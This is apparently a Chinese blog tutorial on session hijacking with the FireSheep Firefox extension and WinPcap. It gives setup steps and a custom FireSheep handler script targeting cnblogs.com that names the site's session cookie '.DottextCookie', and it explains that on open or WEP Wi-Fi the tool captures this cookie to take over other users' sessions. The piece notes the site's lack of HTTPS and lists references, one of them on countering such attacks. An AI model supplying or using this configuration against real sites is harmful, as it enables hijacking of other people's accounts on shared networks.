FireSheep 是两年前的一个 Firefox 扩展,用于演示 HTTP 的会话劫持。现在仍然有很多网站,比如 cnblogs 没使用 HTTPS 连接。因此这种方式仍然有效。
FireSheep 依赖 WinPcap,安装了 WinPcap 之后,安装 FireSheep 时发现,Firefox 版本太高无法使用。我们可以到 PortableApps 网站下载 3.6 版本的绿色版 Firefox。在 Firefox 3.6 中安装并打开 FireSheep,然后可以在选项添加一个 cnblogs 网站,在脚本处填上下面代码:
register({
name: "cnblogs",
domains: [ 'www.cnblogs.com' ],
sessionCookieNames: [ '.DottextCookie' ],
identifyUser: function () {
var site = this.httpGet(this.siteUrl);
this.userName = site.body.querySelector('a#lnkBlogUrl').innerHTML;
}
});
就可以了。上面的 .DottextCookie 就是 cnblogs 网站用于识别用户会话的 cookie 项。FireSheep 将调用 WinPcap 抓取这个 cookie 值,从而达到会话劫持的目的。如果你使用的是无密码或者 WEP 密码的公共WIFI,则这种威胁是切实存在的。
实际上,我们可以使用 Wireshark 软件抓取到更详细的信息。
参考资料:
[1] Firesheep
[2] codebutler/firesheep
[3] Firesheep - Wikipedia, the free encyclopedia
[4] 利用Firesheep对人人网(renren.com)进行会话劫持
[5] 怎样应对会话劫持:以Firesheep为例